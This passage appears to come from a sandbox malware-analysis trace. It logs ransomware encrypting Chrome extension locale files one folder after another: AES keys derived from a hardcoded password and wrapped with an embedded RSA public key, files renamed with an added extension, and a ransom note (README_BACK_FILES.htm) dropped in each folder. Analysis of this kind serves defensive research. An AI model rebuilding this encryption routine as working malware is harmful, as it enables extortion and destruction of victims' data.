Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json", dwFileAttributes=0x0) returned 1 [0253.148] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.gsg")) returned 1 [0253.149] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.fuck")) returned 1 [0253.150] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.150] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.150] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.151] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.151] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.151] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\readme_back_files.htm")) returned 0xffffffff [0253.151] AreFileApisANSI () returned 1 [0253.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.151] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.152] GetFileType (hFile=0x5d50) returned 0x1 [0253.152] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.153] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.153] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.154] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.154] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.154] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.154] GetLastError () returned 0x0 [0253.154] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json")) returned 0x20 [0253.155] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json", dwFileAttributes=0x80) returned 1 [0253.155] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.156] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.158] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.158] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.161] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.161] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.161] CryptHashData (hHash=0x29846a0, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.161] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984be0) returned 1 [0253.161] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.161] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.162] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298d808) returned 1 [0253.162] CryptImportPublicKeyInfo (in: hCryptProv=0x298d808, dwCertEncodingType=0x1, pInfo=0x2994e70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2994ea0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2994ea8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985560) returned 1 [0253.162] CryptEncrypt (in: hKey=0x2985560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.163] CryptEncrypt (in: hKey=0x2985560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298d918*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298d918*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.163] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298d918*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298d918*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.164] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xdc, lpOverlapped=0x0) returned 1 [0253.166] CryptEncrypt (in: hKey=0x2984be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xdc, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0253.166] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0253.166] CloseHandle (hObject=0x5d60) returned 1 [0253.166] CloseHandle (hObject=0x5d5c) returned 1 [0253.167] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json"), bFailIfExists=0) returned 1 [0253.170] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json", dwFileAttributes=0x0) returned 1 [0253.171] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.gsg")) returned 1 [0253.172] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.fuck")) returned 1 [0253.174] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.174] CryptDestroyKey (hKey=0x2984be0) returned 1 [0253.174] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.174] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.174] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.174] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\readme_back_files.htm")) returned 0xffffffff [0253.174] AreFileApisANSI () returned 1 [0253.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.174] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.175] GetFileType (hFile=0x5d50) returned 0x1 [0253.175] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.177] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.177] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.177] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.177] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.177] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.177] GetLastError () returned 0x0 [0253.177] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json")) returned 0x20 [0253.178] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json", dwFileAttributes=0x80) returned 1 [0253.178] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.179] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.180] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.180] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.183] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.183] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.183] CryptHashData (hHash=0x29846a0, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.183] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984be0) returned 1 [0253.183] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.183] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.183] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298d9a0) returned 1 [0253.184] CryptImportPublicKeyInfo (in: hCryptProv=0x298d9a0, dwCertEncodingType=0x1, pInfo=0x2994a60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2994a90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2994a98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985460) returned 1 [0253.184] CryptEncrypt (in: hKey=0x2985460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.184] CryptEncrypt (in: hKey=0x2985460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298da28*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298da28*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.184] WriteFile (in: hFile=0x5d60, lpBuffer=0x298da28*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298da28*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.185] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xdf, lpOverlapped=0x0) returned 1 [0253.186] CryptEncrypt (in: hKey=0x2984be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xdf, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0253.187] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0253.187] CloseHandle (hObject=0x5d5c) returned 1 [0253.187] CloseHandle (hObject=0x5d60) returned 1 [0253.187] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json"), bFailIfExists=0) returned 1 [0253.191] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json", dwFileAttributes=0x0) returned 1 [0253.191] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.gsg")) returned 1 [0253.193] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.fuck")) returned 1 [0253.194] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.194] CryptDestroyKey (hKey=0x2984be0) returned 1 [0253.194] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.194] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.194] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.194] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\readme_back_files.htm")) returned 0xffffffff [0253.194] AreFileApisANSI () returned 1 [0253.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0253.194] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.195] GetFileType (hFile=0x5d50) returned 0x1 [0253.195] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.197] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.197] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.197] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.197] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.197] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.197] 